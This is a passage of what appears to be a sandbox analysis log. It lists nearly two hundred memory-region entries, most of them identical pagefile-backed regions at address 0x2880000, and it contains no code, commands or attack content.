"" Region: id = 9123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9125 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9126 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9127 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9175 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9195 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9196 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9197 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9198 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9199 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9200 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9201 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9202 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9203 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9204 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9205 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9206 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9207 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9208 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9209 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9210 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9211 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9212 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9213 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9214 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9215 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9216 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9217 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9218 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9219 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9220 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9221 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9222 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9223 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9224 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9225 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9226 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9227 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9228 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9229 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9230 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9231 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9232 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9233 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9234 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9235 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9236 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9237 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9238 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9239 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9240 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9241 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9242 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9243 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9244 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9245 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9246 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9247 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9248 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9249 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9250 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9251 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9252 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9253 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9254 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9255 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9256 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9257 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9258 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9259 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9260 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9261 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9262 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9263 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9264 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9265 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9266 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9267 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9268 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9269 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9270 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9271 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9272 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9273 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9274 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9275 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9276 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9277 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9278 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9279 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9280 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9281 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9282 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9283 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9284 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9285 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9286 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9287 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9288 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9289 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9290 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9291 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9292 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9293 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9294 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9295 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9296 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9297 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9298 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9299 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9300 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9301 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9302 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9303 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9304 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9305 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9306 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9307 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9308 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9309 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9310 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = 